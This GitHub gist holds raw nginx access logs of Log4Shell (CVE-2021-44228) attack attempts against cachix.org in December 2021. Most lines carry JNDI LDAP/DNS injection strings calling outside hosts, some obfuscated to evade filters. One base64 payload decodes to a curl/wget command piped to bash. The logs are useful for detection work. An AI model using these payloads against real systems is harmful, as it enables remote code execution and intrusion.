Skip to content

Instantly share code, notes, and snippets.

@domenkozar
Created December 14, 2021 10:19
Show Gist options
  • Save domenkozar/db0e1093bedc6b651b42c512fbfef7cf to your computer and use it in GitHub Desktop.
Save domenkozar/db0e1093bedc6b651b42c512fbfef7cf to your computer and use it in GitHub Desktop.
"12/Dec/2021:00:48:04 +0000" status=404 host=34.205.214.246 request="GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" request_length=184 client=143.198.183.66 bytes_sent=294 body_bytes_sent=146 referer=- user_agent="Kryptos Logic Telltale" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:19:12:58 +0000" status=404 host=34.205.214.246 request="GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" request_length=156 client=195.201.175.217 bytes_sent=294 body_bytes_sent=146 referer=- user_agent="Mozilla/5.0 zgrab/0.x" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:33:06 +0000" status=404 host=cachix.org request="GET /$%7Bjndi:ldap://6c6889d27e144104a5a1.y.psc4fuel.com/7tD39.class%7D HTTP/1.1" request_length=678 client=172.69.62.102 bytes_sent=696 body_bytes_sent=548 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:34:16 +0000" status=404 host=cachix.org request="GET /$%7Bjndi:ldap://b23f7e5fe8114984a7c1.y.psc4fuel.com/DV1IT.class%7D HTTP/1.1" request_length=680 client=172.69.63.78 bytes_sent=696 body_bytes_sent=548 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:35:00 +0000" status=404 host=cachix.org request="GET /$%7Bjndi:ldap://76932c8cc3bb420285a8.y.psc4fuel.com/kSq9A.class%7D HTTP/1.1" request_length=914 client=173.245.54.236 bytes_sent=696 body_bytes_sent=548 referer=https://google.com/${jndi:ldap://76932c8cc3bb420285a8.y.psc4fuel.com/kSq9A.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://76932c8cc3bb420285a8.y.psc4fuel.com/kSq9A.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:37:49 +0000" status=200 host=app.cachix.org request="GET /$%7Bjndi:ldap://73d500abca5d44a3a1ba.y.psc4fuel.com/Ddm8u.class%7D HTTP/1.1" request_length=684 client=172.69.62.140 bytes_sent=1063 body_bytes_sent=833 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:53:32 +0000" status=404 host=cachix.org request="POST /$%7Bjndi:ldap://c6eb6046e7f94aa6a322.y.psc4fuel.com/ywbfk.class%7D HTTP/1.1" request_length=936 client=162.158.94.221 bytes_sent=696 body_bytes_sent=548 referer=https://google.com/${jndi:ldap://c6eb6046e7f94aa6a322.y.psc4fuel.com/ywbfk.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://c6eb6046e7f94aa6a322.y.psc4fuel.com/ywbfk.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:07:29 +0000" status=301 host=app.cachix.org request="GET /$%7Bjndi:ldap://df722dd05277408b9a50.y.psc4fuel.com/APNlX.class%7D HTTP/1.1" request_length=682 client=172.69.62.18 bytes_sent=419 body_bytes_sent=162 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:07:29 +0000" status=200 host=app.cachix.org request="GET /$%7Bjndi:ldap://df722dd05277408b9a50.y.psc4fuel.com/APNlX.class%7D HTTP/1.1" request_length=684 client=172.69.62.18 bytes_sent=1063 body_bytes_sent=833 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:21:25 +0000" status=405 host=app.cachix.org request="POST /$%7Bjndi:ldap://73b74ab52f6f4257acea.y.psc4fuel.com/CLYXK.class%7D HTTP/1.1" request_length=940 client=162.158.88.161 bytes_sent=702 body_bytes_sent=552 referer=https://google.com/${jndi:ldap://73b74ab52f6f4257acea.y.psc4fuel.com/CLYXK.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://73b74ab52f6f4257acea.y.psc4fuel.com/CLYXK.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:50:49 +0000" status=200 host=app.cachix.org request="GET /$%7Bjndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class%7D HTTP/1.1" request_length=920 client=172.69.62.120 bytes_sent=1063 body_bytes_sent=833 referer=https://google.com/${jndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:50:49 +0000" status=301 host=app.cachix.org request="GET /$%7Bjndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class%7D HTTP/1.1" request_length=918 client=172.69.62.120 bytes_sent=419 body_bytes_sent=162 referer=https://google.com/${jndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:00:06:51 +0000" status=404 host=34.205.214.246 request="GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" request_length=156 client=112.74.52.90 bytes_sent=294 body_bytes_sent=146 referer=- user_agent="Mozilla/5.0 zgrab/0.x" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:00:13:22 +0000" status=200 host=34.205.214.246 request="GET / HTTP/1.1" request_length=214 client=157.245.102.218 bytes_sent=817 body_bytes_sent=612 referer=- user_agent="${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:00:13:23 +0000" status=404 host=34.205.214.246 request="GET /favicon.ico HTTP/1.1" request_length=225 client=157.245.102.218 bytes_sent=294 body_bytes_sent=146 referer=- user_agent="${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:04:54:58 +0000" status=200 host=34.205.214.246 request="GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==} HTTP/1.1" request_length=788 client=195.54.160.149 bytes_sent=812 body_bytes_sent=612 referer=${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==} user_agent="${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:15:05:30 +0000" status=200 host=localhost request="GET / HTTP/1.0" request_length=460 client=167.172.44.255 bytes_sent=812 body_bytes_sent=612 referer=- user_agent="borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"14/Dec/2021:04:20:53 +0000" status=200 host=34.205.214.246 request="GET / HTTP/1.1" request_length=169 client=192.46.237.61 bytes_sent=817 body_bytes_sent=612 referer=${jndi:dns://34-205-214-246.scanworld.net/ref} user_agent="${jndi:dns://34-205-214-246.scanworld.net/ua}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"14/Dec/2021:10:13:06 +0000" status=200 host=34.205.214.246 request="GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==} HTTP/1.1" request_length=622 client=92.172.255.25 bytes_sent=817 body_bytes_sent=612 referer=- user_agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"14/Dec/2021:10:13:06 +0000" status=404 host=34.205.214.246 request="GET /favicon.ico HTTP/1.1" request_length=565 client=92.172.255.25 bytes_sent=696 body_bytes_sent=548 referer=http://34.205.214.246/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==} user_agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment